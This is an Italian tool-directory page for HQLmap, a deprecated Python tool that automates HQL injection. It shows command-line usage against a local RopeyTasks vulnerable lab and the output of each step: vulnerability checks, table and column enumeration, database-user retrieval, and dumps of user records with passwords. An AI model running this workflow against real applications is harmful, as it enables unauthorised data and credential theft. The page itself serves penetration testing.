Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HQLmap — (Deprecato) HQLmap, Strumento automatico per sfruttare le iniezioni HQL | Kitploit
Strumenti/GitHubGitHub/paulsec/hqlmap
Scanner di VulnerabilitàSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei DatabaseArchived
GitHubpaulsec/hqlmap

HQLmap

(Deprecato) HQLmap, Strumento automatico per sfruttare le iniezioni HQL

Vedi Repository
22843216 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

HQLMap

Questo progetto è stato creato per sfruttare le iniezioni HQL. Lo strumento è stato scritto in Python e rilasciato sotto licenza MIT. Sviluppi futuri: ho in mente di sviluppare un modulo specifico per SQLmap.

Dove puoi provare lo strumento?

Se vuoi un ambiente vulnerabile veloce dove provare lo strumento, ti consiglio di usare RopeyTasks: https://github.com/continuumsecurity/RopeyTasks/

Inoltre, se desideri ulteriori informazioni su HQLi, dai un'occhiata a questo post del blog: http://blog.h3xstream.com/2014/02/hql-for-pentesters.html

Installazione

Per installare questo progetto, devi solo clonarlo digitando:

git clone [email protected]:PaulSec/HQLmap.git

Utilizzo

Per usare questo progetto, vai nella directory:

cd HQLmap

E avvia il progetto:

python HQLmap.py

Viene quindi mostrato l'utilizzo:

Usage: HQLmap.py [options]

Options:
  -h, --help            show this help message and exit
  --url=URL             qURL to pentest
  --cookie=COOKIE       Cookie to test it
  --param=PARAM         Param to test
  --postdata=POSTDATA   Postdata (POST Method)  
  --message=BLIND_HQLI_MESSAGE
                        Message appearing while Blind HQLi
  --tables              Tries to gather as much tables as possible (With
                        Bruteforce)
  --T=TABLE             Name of the table you want to get
  --table_name_file=FILE_TABLE
                        DB file for name of tables
  --columns             Tries to gather as much columns as possible (With
                        Bruteforce)
  --C=COLUMN            Name of the column you want to get
  --column_name_file=FILE_COLUMN
                        DB file for name of columns
  --check               Check if host is vulnerable
  --user                Tries to get user() from dbms
  --count               Get count of specified table(s)
  --dump                Dump specified table(s) / column(s)
  --results             Enumerate results after session
  --verbose             Verbose mode

Utilizzo

Questa parte include diversi scenari.

Verifica se l'host è vulnerabile

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --check

L'output è molto semplice:

Host seems vulnerable.

Verifica con POSTDATA

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=A101D5D76A260E9ECD2E10ADE9DF0E47" --T=User --results --dump --postdata="username=Test&password=Test!!!"

Enumerazione delle tabelle

$ python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables

Ecco l'output:

[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.

Eseguendo questa enumerazione, lo scanner utilizza il file predefinito per i nomi delle tabelle se non specificato. Il file predefinito è: db/tables.db

Enumerazione delle colonne

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables --columns
[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.
[!] Column Id has been found in table Task
[-] Column username in Task does not exist.
[-] Column password in Task does not exist.
[!] Column Status has been found in table Task
[-] Column user_id in Task does not exist.
(...)
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

Eseguendo questa enumerazione, lo scanner utilizza i file predefiniti sia per i nomi delle tabelle che per i nomi delle colonne. I file predefiniti sono:

Per le tabelle: db/tables.db Per le colonne: db/columns.db

Verifica dell'esistenza di una tabella specifica

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=foo

E l'output:

[-] Table foo does not exist.

Enumerazione delle colonne di una tabella specifica

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --columns

E l'output:

[!] Table User has been found.
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

Verifica dell'esistenza di una colonna specifica per una tabella specifica

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --C=bar

E l'output:

[!] Table User has been found.
[-] Column bar in User does not exist.

Opzioni di fingerprinting

Recupero del conteggio di una tabella

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --count

Oppure per tutte le tabelle:

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --tables --count

E l'output:

[!] Table User has been found.
[!] Count(*) of User : 3

Recupero dell'utente del database

Per eseguire questa azione, è necessario specificare una tabella (o tutte con il flag --tables) e aggiungere il flag --user in questo modo:

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --user

E l'output (dopo qualche secondo):

[!] Table User has been found.
[!] Username of Database found : SA

Per recuperare l'utente, ho implementato un algoritmo molto simile a una "dicotomia variabile".

Dump del database

Tutte le tabelle dal database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --tables --columns --dump

E l'output:

(redacted)
[Task]
  [Name]
     - Bob's shopping
     - Alice's shopping
[Task]
  [User_Id]
     - 1
     - 2
[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
(redacted)

Tabella specifica dal database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --columns --dump

E l'output:

[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
[User]
  [Password]
     - password
     - password
     - password
[User]
  [Email]
     - [email protected]
     - [email protected]
     - [email protected]
[User]
  [Firstname]
     - Robert
     - Alice
     - Administrator
[User]
  [Lastname]
     - McBride
     - O'Reilly
     - Reynolds

Colonna specifica dal database

Scarica lo strumento